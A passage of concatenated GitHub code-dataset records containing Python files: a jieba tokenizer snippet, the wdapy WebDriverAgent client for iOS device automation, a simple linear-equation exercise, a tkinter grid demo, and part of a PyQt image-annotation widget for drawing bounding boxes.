'csv':\n # 
store the tokenized documents as a csv file via pandas\n            dfWord = pd.DataFrame(data=lstDocContent, index=lstFileShow)\n            dfWord.to_csv(pathStore, index=True, header=False, encoding=encoding)\n        elif fileFormat == 'txt':\n            print('not writing')\n    elif storeType == 'separate':\n        print('not writing')\n\n\n","repo_name":"Lucifer094/courseSimlarity","sub_path":"jiebaCut.py","file_name":"jiebaCut.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}
+{"seq_id":"28071353221","text":"# coding: utf-8\n\nimport atexit\nimport base64\nimport io\nimport json\nimport logging\nimport queue\nimport subprocess\nimport sys\nimport threading\nimport time\nimport typing\n\nimport requests\nfrom cached_property import cached_property\nfrom logzero import setup_logger\nfrom PIL import Image\n\nfrom ._alert import Alert\nfrom ._base import BaseClient\nfrom ._logger import logger\nfrom ._proto import *\nfrom ._types import *\nfrom .exceptions import *\nfrom .usbmux import requests_usbmux, usbmux\n\n\nclass HTTPResponse:\n    def __init__(self, resp: requests.Response, err: requests.RequestException):\n        self._resp = resp\n        self._err = err\n\n    def is_success(self) -> bool:\n        return self._err is None and self._resp.status_code == 200\n\n    def json(self) -> dict:\n        assert self._resp is not None\n        try:\n            return self._resp.json()\n        except json.JSONDecodeError:\n            raise RequestError(\"JSON decode error\", self._resp.text)  # editor fix: raise the error instead of returning it\n\n    def get_error_message(self) -> str:\n        if self._resp:\n            return self._resp.text\n        return str(self._err)\n\n    def raise_if_failed(self):\n        if self._err:\n            raise RequestError(\"HTTP request error\", self._err)\n        if self._resp.status_code != 200:\n            raise RequestError(self._resp.status_code, self._resp.text)\n\n\nclass CommonClient(BaseClient):\n    def __init__(self, wda_url: str):\n        super().__init__(wda_url)\n        self.__ui_size = None\n        self.__debug = False\n\n    @property\n    def debug(self) -> bool:\n        return self.__debug\n\n    @debug.setter\n    def debug(self, v: bool):\n        self.__debug = v  # editor fix: remember the flag so the getter reflects it\n        if v:\n            setup_logger(NAME)\n        else:\n            setup_logger(NAME, level=logging.INFO)\n\n    def app_start(self, bundle_id: str, arguments: typing.List[str] = [], environment: typing.Dict[str, str] = {}):\n        self.session_request(POST, \"/wda/apps/launch\", {\n            \"bundleId\": bundle_id,\n            \"arguments\": arguments,\n            \"environment\": environment,\n        })\n\n    def app_terminate(self, bundle_id: str):\n        self.session_request(POST, \"/wda/apps/terminate\", {\n            \"bundleId\": bundle_id\n        })\n\n    def app_state(self, bundle_id: str) -> AppState:\n        value = self.session_request(POST, \"/wda/apps/state\", {\n            \"bundleId\": bundle_id\n        })[\"value\"]\n        return AppState(value)\n\n    def app_current(self) -> AppInfo:\n        self.unlock()\n        st = self.status()\n        if st.session_id is None:\n            self.session()\n        data = self.request(GET, \"/wda/activeAppInfo\")\n        value = data['value']\n        return AppInfo.value_of(value)\n\n    def app_list(self) -> AppList:\n        value = self.session_request(GET, \"/wda/apps/list\")[\"value\"][0]\n        return AppList.value_of(value)\n\n    def deactivate(self, duration: float):\n        self.session_request(POST, \"/wda/deactivateApp\", {\n            \"duration\": duration\n        })\n\n    @cached_property\n    def alert(self) -> Alert:\n        return Alert(self)\n\n    def sourcetree(self) -> SourceTree:\n        data = self.request(GET, \"/source\")\n        return SourceTree.value_of(data)\n\n    def open_url(self, url: str):\n        self.session_request(POST, \"/url\", {\n            \"url\": url\n        })\n\n    def set_clipboard(self, content: str, content_type=\"plaintext\"):\n        \"\"\" only works when 
WDA app is foreground \"\"\"\n self.session_request(POST, \"/wda/setPasteboard\",{\n \"content\": base64.b64encode(content.encode()).decode(),\n \"contentType\": content_type\n })\n \n def get_clipboard(self, content_type=\"plaintext\") -> str:\n data = self.session_request(POST, \"/wda/getPasteboard\",{\n \"contentType\": content_type\n })\n return base64.b64decode(data['value']).decode('utf-8')\n\n def appium_settings(self, kwargs: dict = None) -> dict:\n if kwargs is None:\n return self.session_request(GET, \"/appium/settings\")[\"value\"]\n payload = {\"settings\": kwargs}\n return self.session_request(POST, \"/appium/settings\", payload)[\"value\"]\n\n def is_locked(self) -> bool:\n return self.request(GET, \"/wda/locked\")[\"value\"]\n\n def unlock(self):\n self.request(POST, \"/wda/unlock\")\n\n def lock(self):\n self.request(POST, \"/wda/lock\")\n\n def homescreen(self):\n self.request(POST, \"/wda/homescreen\")\n\n def shutdown(self):\n self.request(GET, \"/wda/shutdown\")\n\n def get_orientation(self) -> Orientation:\n value = self.session_request(GET, '/orientation')['value']\n return Orientation(value)\n\n def window_size(self) -> typing.Tuple[int, int]:\n \"\"\"\n Returns:\n UISize\n \n Ref:\n FBElementCommands.m\n \"\"\"\n data = self.session_request(GET, \"/window/size\")\n return data['value']['width'], data['value']['height']\n \n # 代码暂时保留,下面的方法为通过截图获取屏幕大小\n # # 这里做了一点速度优化,跟进图像大小获取屏幕尺寸\n # orientation = self.get_orientation()\n # if self.__ui_size is None:\n # # 这里认为screenshot返回的屏幕转向时正确的\n # pixel_width, pixel_height = self.screenshot().size\n # w, h = pixel_width//self.scale, pixel_height//self.scale\n # if self.get_orientation() == Orientation.PORTRAIT:\n # self.__ui_size = (w, h)\n # else:\n # self.__ui_size = (h, w)\n\n # if orientation == Orientation.LANDSCAPE:\n # return self.__ui_size[::-1]\n # else:\n # return self.__ui_size\n\n def send_keys(self, value: str):\n \"\"\" input with some text \"\"\"\n self.session_request(POST, \"/wda/keys\", {\"value\": list(value)})\n\n def tap(self, x: int, y: int):\n self.session_request(POST, \"/wda/tap/0\", {\"x\": x, \"y\": y})\n \n def touch_and_hold(self, x: int, y: int, duration: float):\n \"\"\" touch and hold\n \n Ref:\n FBElementCommands.m\n \"\"\"\n self.session_request(POST, \"/wda/touchAndHold\", {\"x\": x, \"y\": y, \"duration\": duration})\n\n def swipe(self,\n from_x: int,\n from_y: int,\n to_x: int,\n to_y: int,\n duration: float = 0.5):\n payload = {\n \"fromX\": from_x,\n \"fromY\": from_y,\n \"toX\": to_x,\n \"toY\": to_y,\n \"duration\": duration}\n self.session_request(POST, \"/wda/dragfromtoforduration\", payload)\n\n def press(self, name: Keycode):\n payload = {\n \"name\": name\n }\n self.session_request(POST, \"/wda/pressButton\", payload)\n\n def press_duration(self, name: Keycode, duration: float):\n hid_usages = {\n \"home\": 0x40,\n \"volumeup\": 0xE9,\n \"volumedown\": 0xEA,\n \"power\": 0x30,\n \"snapshot\": 0x65,\n \"power_plus_home\": 0x65\n }\n name = name.lower()\n if name not in hid_usages:\n raise ValueError(\"Invalid name:\", name)\n hid_usages = hid_usages[name]\n payload = {\n \"page\": 0x0C,\n \"usage\": hid_usages,\n \"duration\": duration\n }\n return self.session_request(POST, \"/wda/performIoHidEvent\", payload)\n\n def volume_up(self):\n self.press(Keycode.VOLUME_UP)\n \n def volume_down(self):\n self.press(Keycode.VOLUME_DOWN)\n\n @cached_property\n def scale(self) -> int:\n # Response example\n # {\"statusBarSize\": {'width': 320, 'height': 20}, 'scale': 2}\n value = 
self.session_request(GET, \"/wda/screen\")['value']\n return value['scale']\n\n def status_barsize(self) -> StatusBarSize:\n # Response example\n # {\"statusBarSize\": {'width': 320, 'height': 20}, 'scale': 2}\n value = self.session_request(GET, \"/wda/screen\")['value']\n return StatusBarSize.value_of(value['statusBarSize'])\n\n def screenshot(self) -> Image.Image:\n \"\"\" take screenshot \"\"\"\n value = self.request(GET, \"/screenshot\")[\"value\"]\n raw_value = base64.b64decode(value)\n buf = io.BytesIO(raw_value)\n im = Image.open(buf)\n return im.convert(\"RGB\")\n\n def battery_info(self) -> BatteryInfo:\n data = self.session_request(GET, \"/wda/batteryInfo\")[\"value\"]\n return BatteryInfo.value_of(data)\n\n @property\n def info(self) -> DeviceInfo:\n return self.device_info()\n\n def device_info(self) -> DeviceInfo:\n data = self.session_request(GET, \"/wda/device/info\")[\"value\"]\n return DeviceInfo.value_of(data)\n \n def keyboard_dismiss(self, key_names: typing.List[str] = [\"前往\", \"发送\", \"Send\", \"Done\", \"Return\"]):\n \"\"\" dismiss keyboard\n 相当于通过点击键盘上的按钮来关闭键盘\n\n Args:\n key_names: list of keys to tap to dismiss keyboard\n \"\"\"\n self.session_request(POST, \"/wda/keyboard/dismiss\", {\"keyNames\": key_names})\n\n\nclass XCUITestRecover(Recover):\n def __init__(self, udid: str):\n self._udid = udid\n\n def recover(self) -> bool:\n \"\"\" launch by tidevice\n \n https://github.com/alibaba/tidevice\n \"\"\"\n logger.info(\"WDA is starting using tidevice ...\")\n args = [sys.executable, '-m', 'tidevice', '-u', self._udid, 'xctest']\n p = subprocess.Popen(args,\n stdin=subprocess.DEVNULL,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n start_new_session=True,\n close_fds=True, encoding=\"utf-8\")\n \n que = queue.Queue()\n threading.Thread(target=self.drain_process_output, args=(p, que), daemon=True).start()\n try:\n success = que.get(timeout=20)\n return success\n except queue.Empty:\n logger.warning(\"WDA launch timeout 20s\")\n p.kill()\n return False\n\n def drain_process_output(self, p: subprocess.Popen, msg_queue: queue.Queue):\n deadline = time.time() + 10\n lines = []\n while time.time() < deadline:\n if p.poll() is not None:\n logger.warning(\"xctest exited, output --.\\n %s\", \"\\n\".join(lines)) # p.stdout.read())\n msg_queue.put(False)\n return\n line = p.stdout.readline().strip()\n lines.append(line)\n # logger.info(\"%s\", line)\n if \"WebDriverAgent start successfully\" in line:\n logger.info(\"WDA started\")\n msg_queue.put(True)\n break\n \n atexit.register(p.terminate)\n while p.stdout.read() != \"\":\n pass\n\n\nclass AppiumClient(CommonClient):\n \"\"\"\n client for https://github.com/appium/WebDriverAgent\n \"\"\"\n\n def __init__(self, wda_url: str = DEFAULT_WDA_URL):\n super().__init__(wda_url)\n\n\nclass AppiumUSBClient(AppiumClient):\n def __init__(self, udid: str = None, port: int = 8100):\n if udid is None:\n _usbmux = usbmux.Usbmux()\n udid = _usbmux.get_single_device_udid()\n super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f\":{port}\")\n self.set_recover_handler(XCUITestRecover(udid))\n\n\nclass NanoClient(AppiumClient):\n \"\"\"\n Repo: https://github.com/nanoscopic/WebDriverAgent\n\n This repo changes a lot recently and the new version code drop the HTTP API to NNG\n So here use the old commit version\n https://github.com/nanoscopic/WebDriverAgent/tree/d07372d73a4cc4dc0b0d7807271e6d7958e57302\n \"\"\"\n\n def tap(self, x: int, y: int):\n \"\"\" fast tap \"\"\"\n self.request(POST, \"/wda/tap\", {\n \"x\": x,\n \"y\": y,\n 
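# Editor note (hedged): unlike CommonClient.tap above, which posts to the
            # session-scoped /wda/tap/0, this NanoAgent endpoint skips session
            # handling, hence the \"fast tap\" docstring.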
})\n\n def fast_swipe(self,\n from_x: int,\n from_y: int,\n to_x: int,\n to_y: int,\n duration: float = .5):\n \"\"\" fast swipe, this method can not simulate back action by swipe left to right \"\"\"\n self.request(POST, \"/wda/swipe\", {\n \"x1\": from_x,\n \"y1\": from_y,\n \"x2\": to_x,\n \"y2\": to_y,\n \"delay\": duration})\n\n\nclass NanoUSBClient(NanoClient):\n def __init__(self, udid: str = None, port: int = 8100):\n if udid is None:\n _usbmux = usbmux.Usbmux()\n udid = _usbmux.get_single_device_udid()\n super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f\":{port}\")\n self.set_recover_handler(XCUITestRecover(udid))\n","repo_name":"openatx/wdapy","sub_path":"wdapy/_wdapy.py","file_name":"_wdapy.py","file_ext":"py","file_size_in_byte":12585,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"23220495010","text":"\"\"\"\nSolve a Linear Equation\nCreate a function that returns the value of x (the \"unknown\" in the equation). Each equation will be formatted like this:\n\nx + 6 = 12\nExamples\nsolve(\"x + 43 = 50\") ➞ 7\n\nsolve(\"x - 9 = 10\") ➞ 19\n\nsolve(\"x + 300 = 100\") ➞ -200\nNotes\n\"x\" will always be in the same place (you will not find an equation like 6 + x = 12).\nEvery equation will include either subtraction (-) or addition (+).\n\"x\" may be negative.\n\"\"\"\ndef solve(eq):\n \n a= eq.split(\" \")\n if a[1] == \"+\":\n return int(a[4]) - int(a[2])\n if a[1] == \"-\":\n return int(a[4]) + int(a[2]) \n \n\n\n\n\n#solve(\"x + 43 = 50\") #➞ 7\nsolve(\"x - 9 = 10\") #➞ 19\n#solve(\"x + 300 = 100\") #➞ -200\n","repo_name":"mankarali/TRAINING","sub_path":"EXAMPLES/EDABIT/EARLIER/33_solve_a_linear_equation.py","file_name":"33_solve_a_linear_equation.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"70562042338","text":"from tkinter import *\n\nfrom pyparsing import col\n\nroot = Tk()\n\ntulisan1 = Label(root, text=\"Halo...\")\ntulisan2 = Label(root, text=\"Nama saya Gabriel.\")\n\ntulisan1.grid(row=0, column=0)\ntulisan2.grid(row=1, column=1)\n\nroot.mainloop()","repo_name":"ifs21010-itdel/pg-python","sub_path":"gui/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6600015283","text":"# ImageView.py (vars-localize)\nfrom ui.ConceptSearchbar import ConceptSearchbar\nfrom ui.EntryTree import EntryTreeItem, update_imaged_moment_entry\nfrom PyQt5.QtCore import Qt, QPoint, QPointF, QRectF, QLineF\nfrom PyQt5.QtGui import QResizeEvent, QMouseEvent, QPixmap, QColor, QKeyEvent, QPen, QFont\nfrom PyQt5.QtWidgets import QGraphicsView, QGraphicsScene, QDialog, QVBoxLayout, QPushButton, QInputDialog, QMessageBox\n\nfrom ui.BoundingBox import BoundingBoxManager, GraphicsBoundingBox, SourceBoundingBox\nfrom ui.PropertiesDialog import PropertiesDialog\nfrom util import utils\nfrom util.requests import delete_box, create_box, modify_box, create_observation, fetch_image, \\\n get_all_parts, get_video_data\n\n__author__ = \"Kevin Barnard\"\n__copyright__ = \"Copyright 2019, Monterey Bay Aquarium Research Institute\"\n__credits__ = [\"MBARI\"]\n__license__ = \"GPL\"\n__maintainer__ = \"Kevin Barnard\"\n__email__ = \"kbarnard@mbari.org\"\n__doc__ = '''\n\nQGraphicsView custom widget for controlling image/localization graphics and input.\n\n@author: __author__\n@status: __status__\n@license: 
__license__\n'''\n\n\nclass ImageView(QGraphicsView):\n\n def __init__(self, parent=None):\n super(ImageView, self).__init__(parent)\n\n self.setStyleSheet('border: 0px;')\n self.setMinimumSize(1200, 675)\n self.setMouseTracking(True)\n\n self.image_scene = QGraphicsScene()\n self.setScene(self.image_scene)\n self.refit()\n\n self.observation_uuid = None\n self.observer = None\n self.moment = None\n self.observation_map = None\n self.enabled_observations = None\n\n self.pixmap_src = None\n self.pixmap_scalar = None\n self.pixmap_pos = None\n\n self.select_next = None\n self.select_prev = None\n\n # Graphical box selection\n self.pt_1 = None\n self.pt_2 = None\n self.selected_box = None\n self.hovered_box = None\n self.mouse_line_pen = QPen(Qt.red)\n self.mouse_hline = QLineF()\n self.mouse_vline = QLineF()\n\n self.hov_tl_rect = None\n self.hov_tr_rect = None\n self.hov_bl_rect = None\n self.hov_br_rect = None\n self.resize_type = None\n self.resize_offset = None\n\n self.hov_pt_1 = None\n\n def redraw(self):\n \"\"\"\n Redraw scene with all necessary components\n :return: None\n \"\"\"\n self.clear()\n self.refit()\n self.scene().setBackgroundBrush(QColor(0, 0, 0))\n if self.pixmap_src: # Image loaded, draw image + relevant components\n self.draw_pixmap(self.pixmap_src)\n\n self.draw_ancillary_data()\n\n if self.enabled_observations:\n for uuid, enabled in self.enabled_observations.items():\n if not enabled:\n continue\n for box in self.observation_map[uuid].metadata['boxes']:\n box_item = self.draw_bounding_box(box, self.observation_map[uuid].metadata['box_manager'])\n if self.selected_box == box:\n box_item.set_highlighted(True)\n if self.hovered_box == box:\n self.draw_drag_corners(box_item)\n\n # Draw crosshairs\n self.scene().addLine(self.mouse_hline, self.mouse_line_pen)\n self.scene().addLine(self.mouse_vline, self.mouse_line_pen)\n self.setCursor(Qt.BlankCursor)\n\n drag_rect = self.calc_drag_rect()\n if drag_rect: # Drag rectangle should be drawn\n top_left = self.get_scene_rel_point(QPointF(drag_rect.x(), drag_rect.y()))\n scaled_size = drag_rect.size() * self.pixmap_scalar\n self.scene().addRect(QRectF(top_left, scaled_size), QColor(0, 255, 0))\n else: # No image loaded\n text_item = self.scene().addText('No image loaded.', QFont('Courier New'))\n text_item.setDefaultTextColor(QColor(255, 255, 255))\n text_item.setPos(self.width() / 2 - text_item.boundingRect().width() / 2,\n self.height() / 2 - text_item.boundingRect().height() / 2)\n self.setCursor(Qt.ArrowCursor)\n\n def clear(self):\n \"\"\"\n Empty everything from the scene, reset bounding box managers\n :return: None\n \"\"\"\n self.scene().clear()\n if self.observation_map:\n for box_manager in [entry.metadata['box_manager'] for entry in self.observation_map.values()]:\n box_manager.clear()\n\n def set_entry(self, entry: EntryTreeItem):\n \"\"\"\n Set the selected entry, load associated data\n :param entry: Entry tree item to from\n :return: None\n \"\"\"\n if entry.metadata['type'] == 'imaged_moment':\n entry.setExpanded(True)\n if entry != self.moment:\n self.load_moment(entry)\n self.select_observation('all')\n elif entry.metadata['type'] == 'observation':\n if entry.parent() != self.moment:\n self.load_moment(entry.parent())\n self.select_observation(entry.metadata['uuid'])\n\n def load_moment(self, entry: EntryTreeItem):\n \"\"\"\n Load pertinent data from imaged moment entry\n :param entry: Entry tree item of imaged moment\n :return: None\n \"\"\"\n self.moment = entry\n if 'cached_image' not in 
entry.metadata.keys(): # Cache pixmap\n entry.metadata['cached_image'] = fetch_image(entry.metadata['url'])\n self.set_pixmap(entry.metadata['cached_image']) # Set pixmap\n observation_entries = [entry.child(idx) for idx in range(entry.childCount())]\n self.observation_map = dict([(entry.metadata['uuid'], entry) for entry in observation_entries]) # observation uuid -> entry tree item\n self.enabled_observations = dict()\n for observation_entry in observation_entries:\n uuid = observation_entry.metadata['uuid']\n observation_entry.metadata['box_manager'] = BoundingBoxManager() # Construct new bounding box manager\n observation_entry.metadata['box_manager'].set_box_click_callback(self.show_box_properties_dialog)\n self.enabled_observations[uuid] = True\n\n def draw_drag_corners(self, box: GraphicsBoundingBox):\n length = 10\n tl_rect = self.scene().addRect(box.x(), box.y(), length, length, pen=box.color.lighter())\n tr_rect = self.scene().addRect(box.x() + box.width - length, box.y(), length, length, pen=box.color.lighter())\n bl_rect = self.scene().addRect(box.x(), box.y() + box.height - length, length, length, pen=box.color.lighter())\n br_rect = self.scene().addRect(box.x() + box.width - length, box.y() + box.height - length, length, length, pen=box.color.lighter())\n\n self.hov_tl_rect = tl_rect.rect()\n self.hov_tr_rect = tr_rect.rect()\n self.hov_bl_rect = bl_rect.rect()\n self.hov_br_rect = br_rect.rect()\n\n def set_pixmap(self, pixmap):\n \"\"\"\n Set source pixmap, clear corner points\n :return: None\n \"\"\"\n self.pixmap_src = pixmap\n self.pt_1 = None\n self.pt_2 = None\n\n def select_observation(self, observation_uuid: str):\n \"\"\"\n Select and display bounding boxes for specified observation only\n :param observation_uuid: Observation UUID to source\n :return: None\n \"\"\"\n for uuid in self.enabled_observations.keys():\n self.enabled_observations[uuid] = True if (observation_uuid == uuid or observation_uuid == 'all') else False\n self.observation_uuid = observation_uuid if observation_uuid != 'all' else None\n\n def refit(self):\n \"\"\"\n Refit sceneRect to fit entire view\n :return: None\n \"\"\"\n self.setSceneRect(0, 0, self.width(), self.height())\n\n def draw_pixmap(self, pixmap: QPixmap):\n \"\"\"\n Scale and draw pixmap in scene\n :param pixmap: Pixmap object to draw\n :return: None\n \"\"\"\n if not pixmap or pixmap.isNull():\n return\n scaled_pixmap = pixmap.scaled(self.width(), self.height(), Qt.KeepAspectRatio)\n self.pixmap_scalar = scaled_pixmap.width() / pixmap.width()\n self.pixmap_pos = QPointF(\n self.width() / 2 - scaled_pixmap.width() / 2,\n self.height() / 2 - scaled_pixmap.height() / 2)\n\n pixmap_item = self.scene().addPixmap(scaled_pixmap)\n pixmap_item.setPos(self.pixmap_pos)\n return pixmap_item\n\n def draw_ancillary_data(self):\n \"\"\"\n Draw ancillary data on the image, if there is any\n :return: None\n \"\"\"\n if 'ancillary_data' in self.moment.metadata.keys():\n ancillary_data = self.moment.metadata['ancillary_data']\n\n text_dict = {}\n\n if 'depth_meters' in ancillary_data:\n text_dict['Depth (m): {:<10.2f}'] = ancillary_data['depth_meters']\n\n if 'latitude' in ancillary_data:\n text_dict['Latitude: {:<10.3f}'] = ancillary_data['latitude']\n\n if 'longitude' in ancillary_data:\n text_dict['Longitude: {:<10.3f}'] = ancillary_data['longitude']\n\n if 'recorded_date' in self.moment.metadata.keys():\n text_dict['Recorded: {:<20}'] = self.moment.metadata['recorded_date'].replace('T', ' ').replace('Z', '')\n\n if 'video_data' not in 
self.moment.metadata.keys():\n video_data = get_video_data(self.moment.metadata['video_reference_uuid'])\n self.moment.metadata['video_data'] = video_data\n\n if self.moment.metadata['video_data'] and 'uri' in self.moment.metadata['video_data']:\n video_sequence_name = self.moment.metadata['video_data']['uri'].split(':')[-1]\n text_dict['Video: {:<10}'] = video_sequence_name\n\n text_str = ' '.join(k.format(v) for k, v in text_dict.items())\n text_item = self.scene().addText(text_str, QFont('Courier New'))\n text_item.setDefaultTextColor(QColor(255, 255, 255))\n text_item.setPos(10, self.height() - text_item.boundingRect().height() - 10)\n\n def draw_bounding_box(self, box_src: SourceBoundingBox, manager: BoundingBoxManager):\n \"\"\"\n Draw a bounding box in the scene, add to box manager\n :param box_src: Source bounding box to add\n :param manager: Bounding box manager\n :return: Graphical bounding box item\n \"\"\"\n box_pos = self.get_scene_rel_point(QPointF(box_src.x(), box_src.y()))\n box_item = manager.make_box(\n box_pos.x(),\n box_pos.y(),\n self.pixmap_scalar * box_src.width(),\n self.pixmap_scalar * box_src.height(),\n box_src.label,\n box_src)\n self.scene().addItem(box_item)\n return box_item\n\n def get_im_rel_point(self, pt: QPoint):\n \"\"\"\n Convert a scene-relative point to an image-relative point\n :return: Point relative to the image\n \"\"\"\n return QPointF(\n (pt.x() - self.pixmap_pos.x()) / self.pixmap_scalar,\n (pt.y() - self.pixmap_pos.y()) / self.pixmap_scalar,\n )\n\n def get_scene_rel_point(self, pt: QPointF):\n \"\"\"\n Convert an image-relative point to a scene-relative point\n :return: Point relative to the scene\n \"\"\"\n return QPoint(\n self.pixmap_scalar * pt.x() + self.pixmap_pos.x(),\n self.pixmap_scalar * pt.y() + self.pixmap_pos.y()\n )\n\n def show_box_properties_dialog(self, box: GraphicsBoundingBox):\n \"\"\"\n Construct a dialog for bounding box properties\n :param box: Graphical bounding box object to manipulate\n :return: None\n \"\"\"\n self.selected_box = box.source\n self.redraw()\n\n box_json_before = box.source.get_json()\n box_label_before = box.source.label\n\n dialog = PropertiesDialog(box.source)\n dialog.setup_form(self.pixmap_src, self.redraw)\n dialog.set_delete_callback(self.delete_box)\n\n dialog.setModal(True)\n dialog.exec_()\n\n box_json_after = box.source.get_json()\n if box_json_after != box_json_before:\n box.source.observer = self.observer # Update observer field\n box.source.strength = utils.get_observer_confidence(box.source.observer) # Update strength field\n modify_box(box_json_after, box.source.observation_uuid, box.source.association_uuid) # Call modification request\n update_imaged_moment_entry(self.moment) # Update tree\n\n self.pt_1 = None\n self.pt_2 = None\n\n self.selected_box = None\n self.redraw()\n\n def delete_box(self, box: SourceBoundingBox):\n \"\"\"\n Delete a box from the source, save\n :param box: Source bounding box to delete\n :return: None\n \"\"\"\n source_boxes = self.observation_map[box.observation_uuid].metadata['boxes']\n if box in self.observation_map[box.observation_uuid].metadata['boxes']: # Protect\n source_boxes.remove(box)\n delete_box(box.association_uuid) # Call deletion request\n update_imaged_moment_entry(self.moment) # Update tree\n\n def calc_drag_rect(self):\n \"\"\"\n Compute the drag selection rectangle if possible\n :return: Rectangle if possible, else None\n \"\"\"\n if self.pt_1 and self.pt_2:\n x = self.pt_1.x()\n y = self.pt_1.y()\n w = self.pt_2.x() - x\n h = 
self.pt_2.y() - y\n\n if w < 0:\n w = -w\n x = self.pt_2.x()\n if h < 0:\n h = -h\n y = self.pt_2.y()\n\n return QRectF(x, y, w, h)\n return None\n\n def calc_crop_rect(self, drag_rect: QRectF):\n \"\"\"\n Crop a rectangle to the bounds of the image\n :param drag_rect: Drag rectangle\n :return: Cropped rectangle\n \"\"\"\n x = drag_rect.x()\n y = drag_rect.y()\n w = drag_rect.width()\n h = drag_rect.height()\n if x < 0:\n w += x\n x = 0\n if y < 0:\n h += y\n y = 0\n if x + w > self.pixmap_src.width():\n w = self.pixmap_src.width() - x\n if y + h > self.pixmap_src.height():\n h = self.pixmap_src.height() - y\n\n return QRectF(x, y, w, h)\n\n def prompt_concept(self):\n \"\"\"\n Prompt for a concept selection and return selection\n :return: Concept selected\n \"\"\"\n dialog = QDialog()\n dialog.setLayout(QVBoxLayout())\n dialog.setWindowTitle('Specify a concept')\n dialog.setWindowFlag(Qt.WindowCloseButtonHint, False)\n search = ConceptSearchbar()\n\n submit_button = QPushButton('Submit')\n submit_button.setEnabled(False)\n submit_button.pressed.connect(dialog.close)\n\n concept_selected = ''\n\n def update_concept_selected(concept):\n nonlocal concept_selected\n nonlocal submit_button\n concept_selected = concept\n submit_button.setEnabled(True)\n\n search.set_callback(update_concept_selected)\n\n dialog.layout().addWidget(search)\n dialog.layout().addWidget(submit_button)\n\n dialog.setModal(True)\n dialog.exec_()\n\n return concept_selected\n\n def make_new_observation(self, concept):\n \"\"\"\n Create a new observation of the specified concept\n :param concept: Concept to observe\n :return: Observation JSON response\n \"\"\"\n kwargs = dict()\n fields = self.moment.metadata.keys()\n if 'timecode' in fields:\n kwargs['timecode'] = self.moment.metadata['timecode']\n if 'elapsed_time_millis' in fields:\n kwargs['elapsed_time_millis'] = self.moment.metadata['elapsed_time_millis']\n if 'recorded_date' in fields:\n kwargs['recorded_timestamp'] = self.moment.metadata['recorded_date']\n\n observation = create_observation( # Call observation creation request\n self.moment.metadata['video_reference_uuid'],\n concept,\n self.observer,\n **kwargs\n )\n\n self.moment.treeWidget().editable_uuids.add(observation['observation_uuid'])\n\n self.reload_moment()\n\n return observation\n\n def reload_moment(self):\n \"\"\"\n Fully reload the imaged moment.\n :return: None\n \"\"\"\n image = self.moment.metadata['cached_image'] # Backup image, so no re-fetch\n self.moment.treeWidget().load_imaged_moment_entry(self.moment) # Reload the tree\n self.moment.metadata['cached_image'] = image\n self.load_moment(self.moment) # Reload imaged moment\n\n def handle_new_box(self, box: SourceBoundingBox):\n \"\"\"\n Create a new box, creating new observation if needed\n :param box: Source bounding box\n :return: None\n \"\"\"\n uuid = self.observation_uuid\n if not uuid: # Imaged moment selected\n new_concept = self.prompt_concept()\n if not new_concept: # No concept was specified\n return\n observation = self.make_new_observation(new_concept)\n box.set_label(new_concept)\n uuid = observation['observation_uuid']\n\n box.observation_uuid = uuid\n self.draw_bounding_box(box, self.observation_map[uuid].metadata['box_manager'])\n self.observation_map[uuid].metadata['boxes'].append(box)\n response_json = create_box(box.get_json(), uuid, to_concept=box.part)\n box.association_uuid = response_json['uuid']\n update_imaged_moment_entry(self.moment) # Update tree\n\n def reset_mouse(self):\n self.pt_1 = None\n self.pt_2 = None\n 
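# Editor note (hedged): pt_1/pt_2 feed calc_drag_rect() above, which normalises a
        # drag in any direction; e.g. pt_1=(50, 80), pt_2=(10, 20) -> QRectF(10, 20, 40, 60).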
self.hov_pt_1 = None\n self.resize_offset = None\n self.resize_type = None\n self.redraw()\n\n def mouseReleaseEvent(self, event: QMouseEvent) -> None:\n if self.pixmap_src:\n new_rect = self.calc_drag_rect()\n if new_rect:\n new_rect = self.calc_crop_rect(new_rect)\n box_json = {\n 'x': int(new_rect.x()),\n 'y': int(new_rect.y()),\n 'width': int(new_rect.width()),\n 'height': int(new_rect.height()),\n 'image_reference_uuid': self.moment.metadata['image_reference_uuid']\n }\n\n concept = self.observation_map[self.observation_uuid].metadata['concept'] if self.observation_uuid else ''\n observer = self.observer\n\n acceptable_parts = ['self'] + get_all_parts()\n part, part_accepted = QInputDialog.getItem(self, 'Part Selection', 'Select a part',\n acceptable_parts,\n current=0)\n if not part_accepted:\n self.reset_mouse()\n return\n\n if part not in acceptable_parts:\n QMessageBox.critical(self, 'Error: Bad Part',\n 'Bad concept part: \"{}\". Localization not created.'.format(part))\n self.reset_mouse()\n return\n\n new_src_box = SourceBoundingBox(\n box_json,\n concept,\n observer,\n utils.get_observer_confidence(observer),\n part=part\n )\n if new_src_box.width() * new_src_box.height() > 100:\n self.handle_new_box(new_src_box)\n\n if self.resize_type:\n modify_box(self.hovered_box.get_json(), self.hovered_box.observation_uuid, self.hovered_box.association_uuid)\n\n self.reset_mouse()\n\n def mousePressEvent(self, event: QMouseEvent) -> None:\n if self.pixmap_src:\n self.pt_1 = self.get_im_rel_point(event.pos())\n if self.hovered_box:\n corner_box = None\n self.hov_pt_1 = self.get_im_rel_point(event.pos())\n if self.hov_tl_rect.contains(event.pos()):\n self.resize_type = 1\n corner_box = self.hov_tl_rect\n elif self.hov_tr_rect.contains(event.pos()):\n self.resize_type = 2\n corner_box = self.hov_tr_rect\n elif self.hov_bl_rect.contains(event.pos()):\n self.resize_type = 3\n corner_box = self.hov_bl_rect\n elif self.hov_br_rect.contains(event.pos()):\n self.resize_type = 4\n corner_box = self.hov_br_rect\n else:\n self.hov_pt_1 = None\n\n if corner_box:\n self.pt_1 = None\n x, y, _, _ = corner_box.getRect()\n corner = self.get_im_rel_point(QPoint(x, y))\n self.resize_offset = self.hov_pt_1 - corner\n\n def mouseMoveEvent(self, event: QMouseEvent) -> None:\n if self.pixmap_src:\n self.pt_2 = self.get_im_rel_point(event.pos())\n if 